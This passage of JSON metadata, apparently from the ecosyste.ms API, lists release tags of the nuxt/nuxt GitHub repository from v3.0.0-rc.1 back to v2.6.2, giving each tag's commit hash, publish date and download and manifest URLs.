/releases/tag/v3.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.1/manifests"},{"name":"@nuxt/ui-templates@0.1.0","sha":"434afa4351240467b5fd99a913adc4970ff99584","kind":"tag","published_at":"2022-04-19T07:55:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.1.0/manifests"},{"name":"@nuxt/ui-assets@0.1.0","sha":"434afa4351240467b5fd99a913adc4970ff99584","kind":"tag","published_at":"2022-04-19T07:55:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-assets@0.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-assets@0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-assets%400.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-assets@0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-assets@0.1.0/manifests"},{"name":"@nuxt/ui@0.1.0","sha":"434afa4351240467b5fd99a913adc4970ff99584","kind":"tag","published_at":"2022-04-19T07:55:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.1.0/manifests"},{"name":"v2.15.8","sha":"d4b9e4b0553bcd617ecbc0b8b76871070b347fcb","kind":"tag","published_at":"2021-08-11T21:10:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.8/manifests"},{"name":"v2.15.7","sha":"4f370e2043b7731db0e8ef65a4f88431cd8795f3","kind":"tag","published_at":"2021-06-14T13:59:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.7/manifests"},{"name":"v2.15.6","sha":"0eae970e74f1fbf29f400a3178f54061a79bfac2","kind":"tag","published_at":"2021-05-12T10:47:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.6/manifests"},{"name":"v2.15.5","sha":"0460a278ab5258f0cd6d3fe8fc014f892b2bdaf6","kind":"tag","published_at":"2021-05-09T08:17:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.5/manifests"},{"name":"v2.15.4","sha":"b39dcda6adf21e4eb82caef7895440755c6d96fc","kind":"tag","published_at":"2021-04-01T11:23:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.4/manifests"},{"name":"v2.15.3","sha":"24a0c7e27123874f9545c46852b2e7d34920b017","kind":"tag","published_at":"2021-03-10T12:25:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.3/manifests"},{"name":"v2.15.2","sha":"b7f9cdc2a44dbf25b1bd1845fdc8ebb65b0f0754","kind":"tag","published_at":"2021-02-23T09:20:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.2/manifests"},{"name":"v2.15.1","sha":"95daddf43c3b9e9474870631727755ecd2e94319","kind":"tag","published_at":"2021-02-19T16:39:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.1/manifests"},{"name":"v2.15.0","sha":"dcfb42b77221f559e7ccb09edd5c2a2004c5bc6b","kind":"tag","published_at":"2021-02-15T11:06:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.0/manifests"},{"name":"v2.14.12","sha":"bde4c5f6b0e643716d97027cdd185891ada02f7f","kind":"tag","published_at":"2020-12-16T13:15:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.12","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.12/manifests"},{"name":"v2.14.11","sha":"d85f4b92642f4668463deb286524d424e57a1f62","kind":"tag","published_at":"2020-12-09T23:21:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.11","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.11/manifests"},{"name":"v2.14.10","sha":"e97051adfafb9517cabbfd9b87a02e8c37ce949e","kind":"tag","published_at":"2020-12-07T10:30:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.10","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.10/manifests"},{"name":"v2.14.9","sha":"e9f380c9e6b729ab77b38babba6ad15e95b4efa8","kind":"tag","published_at":"2020-12-02T10:35:33.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.9/manifests"},{"name":"v2.14.8","sha":"68d8fb84872b807b2149756bb97a84961854a2c3","kind":"tag","published_at":"2020-12-01T11:06:52.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.8/manifests"},{"name":"v2.14.7","sha":"265d0e7aac3df9f83f323c4d2dba11434956fe9b","kind":"tag","published_at":"2020-10-15T16:29:55.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.7/manifests"},{"name":"v2.14.6","sha":"41176577ad71a8b91a91ca8f458fd64a278dd88d","kind":"tag","published_at":"2020-09-21T10:46:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.6/manifests"},{"name":"v2.14.5","sha":"3b037720f2edc3e351d200bbb8525df1e93d7aad","kind":"tag","published_at":"2020-09-10T12:36:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.5/manifests"},{"name":"v2.14.4","sha":"1a77fba4eb247faa3f1c8ec0fa49ce372abeb1d8","kind":"tag","published_at":"2020-08-27T10:26:49.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.4/manifests"},{"name":"v2.14.3","sha":"5e9d759d7bee6a3d32e16ef05eef988e882c600a","kind":"tag","published_at":"2020-08-16T17:04:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.3/manifests"},{"name":"v2.14.2","sha":"34c56722c8c97c0c6a59ecfbc5836c38047e4572","kind":"tag","published_at":"2020-08-16T10:59:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.2/manifests"},{"name":"v2.14.1","sha":"c30499d7e02cd6d8b51d97ee7d7a537d8a59f63b","kind":"tag","published_at":"2020-08-04T16:37:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.1/manifests"},{"name":"v2.14.0","sha":"60f68638cb80ab461c5b02be34e8797677bd8dd1","kind":"tag","published_at":"2020-07-27T17:25:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.0/manifests"},{"name":"v2.13.3","sha":"e3821ba78c23fafa753941a0c206bd23e39dd678","kind":"tag","published_at":"2020-07-02T18:08:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.13.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.3/manifests"},{"name":"v2.13.2","sha":"c998072c94eef659d45819eaa2b18897b8923538","kind":"tag","published_at":"2020-06-26T19:03:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.2/manifests"},{"name":"v2.13.1","sha":"56b158e7d689ba9f57e7aa83d672f5f32b18767b","kind":"tag","published_at":"2020-06-24T08:38:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.1/manifests"},{"name":"v2.13.0","sha":"dbecbe4adae6a7ae172eb01a232d1804c7b996bc","kind":"tag","published_at":"2020-06-18T17:45:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.0/manifests"},{"name":"v2.12.2","sha":"fb33bda6d114cde19b029ab71c810032ef51184f","kind":"tag","published_at":"2020-03-31T10:43:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.12.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.2/manifests"},{"name":"v2.12.1","sha":"8d355956d49c71349d165c4ca7531107e20d7b27","kind":"tag","published_at":"2020-03-25T19:22:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.12.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.1/manifests"},{"name":"v2.12.0","sha":"205a089f833f96298d9bd723aea15b93618ec05d","kind":"tag","published_at":"2020-03-17T16:45:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.12.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.0/manifests"},{"name":"v2.11.0","sha":"7af9ec8c23d247b22f71866b7b5dcd100f08048d","kind":"tag","published_at":"2019-12-17T10:23:56.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.11.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.11.0/manifests"},{"name":"v2.10.2","sha":"f6aa45dda605cae2ea51f7413c97190a7a02cb88","kind":"commit","published_at":"2019-10-21T21:16:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.10.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.2/manifests"},{"name":"v2.10.1","sha":"624c4c058e47fd36c484efaf1494b762f585f633","kind":"tag","published_at":"2019-10-11T08:11:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.10.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.1/manifests"},{"name":"v2.10.0","sha":"c17afa77a7c7490863c2040c8f448ba80082a891","kind":"tag","published_at":"2019-10-02T11:44:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.10.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.0/manifests"},{"name":"v2.9.2","sha":"c8ee9a660809e856c28d8678c6a632bbdd6ed00f","kind":"tag","published_at":"2019-08-28T11:32:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.9.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"0157b971de97daecf2fadeafa5596ddaa30cdb28","kind":"tag","published_at":"2019-08-20T11:13:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.9.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"ce3b4569613866a69b96f0f89aa2bb7d9810f8c4","kind":"tag","published_at":"2019-08-20T08:24:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.9.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.0/manifests"},{"name":"v2.8.1","sha":"2fabea9402864828fe9aafe8b0d13bcc674a1b3b","kind":"tag","published_at":"2019-06-04T20:28:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.8.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"82ec7b7dedfbc3a01b981a0ef72375814e023291","kind":"tag","published_at":"2019-05-30T17:09:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.8.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.0/manifests"},{"name":"v2.7.1","sha":"0f609dfb3772ec2682bf67c42762df6041dab034","kind":"tag","published_at":"2019-05-14T18:56:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.7.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"5a98230ec617582f7b9393ad27e20fb5a1e6aa04","kind":"tag","published_at":"2019-05-14T12:38:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.7.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.0/manifests"},{"name":"v2.6.3","sha":"2108cd669c56bb2e566c35ac73d8e693b5ce5c54","kind":"tag","published_at":"2019-04-25T08:43:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"8d14cd4781095dff46a57ae05d60bbaccefb0fbd","kind":"tag","published_at":"2019-04-21T11:22:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.2